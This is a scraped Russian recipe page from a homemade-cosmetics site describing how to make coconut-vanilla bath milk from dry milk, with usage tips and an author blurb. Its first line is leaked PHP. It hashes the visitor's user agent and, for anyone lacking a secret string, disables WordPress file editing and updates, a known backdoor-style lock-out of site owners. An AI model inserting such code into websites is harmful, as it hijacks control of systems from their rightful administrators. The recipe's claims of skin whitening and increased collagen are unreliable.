if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Молочко для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Молочко для ванны

Молочко для ванны готовят из сухого молока или сливок, обогащая их натуральными растительными маслами, сухоцветами, морской солью, эфирными маслами или ароматизаторами

Домашняя косметика - Молочко для ванны Домашняя косметика - Молочко для ванны

Молоч­ко для ван­ны гото­вят из сухо­го моло­ка или сли­вок, обо­га­щая их нату­раль­ны­ми рас­ти­тель­ны­ми мас­ла­ми, сухо­цве­та­ми, мор­ской солью, эфир­ны­ми мас­ла­ми или ароматизаторами.

В неко­то­рых слу­ча­ях добав­ля­ют кра­си­те­ли, хотя мне кажет­ся, что молоч­ко долж­но быть бело­го или кре­мо­во­го оттенков.

Рецепт коко­со­во­го молоч­ка для ванны

Итак, при­го­то­вим коко­со­во-ваниль­ное молоч­ко. Берем 200 г сухо­го моло­ка, добав­ля­ем 50 г ваниль­но­го порош­ка и 50 г пере­мо­ло­той коко­со­вой струж­ки (или коко­со­во-ваниль­ную отдуш­ку), нали­ва­ем 1–2 чай­ной лож­ки мас­ла мин­да­ля (или вино­град­ных косто­чек), интен­сив­но раз­ме­ши­ва­ем и остав­ля­ем на день-два. Молоч­ком мож­но поль­зо­вать­ся. Рецепт рас­счи­тан на 1–2 применения.

Кожа после при­ня­тия такой ван­ны будет более мяг­кой и глад­кой и со вре­ме­нем отбе­лит­ся. Так­же молоч­ные ван­ны при­да­ют упру­гость коже и уси­ли­ва­ют выра­бот­ку кол­ла­ге­на, что замед­ля­ет про­цесс ста­ре­ния. Если при­го­то­вить молоч­ко из сухих сли­вок, эффект будет более выра­жен­ным и про­дол­жи­тель­ным. Слив­ки пре­вос­ход­но увлаж­ня­ют кожу.

При­ме­не­ние молоч­ка для ванны:

Молоч­ко  для  ванн мож­но  исполь­зо­вать  как  для  купа­ния все­го тела, так  и ван­но­чек для рук и ног. В  неболь­шом  коли­че­стве  тёп­лой  воды  рас­тво­ря­ют поро­шок молоч­ка для ванн и добав­ля­ют в ван­ну. Для полу­че­ния  энер­гии и бод­ро­сти при­ни­май­те про­хлад­ную  ван­ну  с тем­пе­ра­ту­рой воды 18,5–27,5˚C. Для  релак­са­ции  —  тёп­лую, мож­но  горя­чую  ван­ну, с тем­пе­ра­ту­рой воды 32,5 – 40˚C. Если  поро­шок  молоч­ка  сыпать  под струю воды, то может созда­вать­ся лёг­кая пена, кото­рая сде­ла­ет купа­ние с молоч­ком ещё более при­ят­ным. Реко­мен­ду­ет­ся при­ни­мать ван­ну от 5 до 20 минут.

Дру­гие рецеп­ты при­го­тов­ле­ния молоч­ка для ван­ны смот­ри­те в соот­вет­ству­ю­щем разделе.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!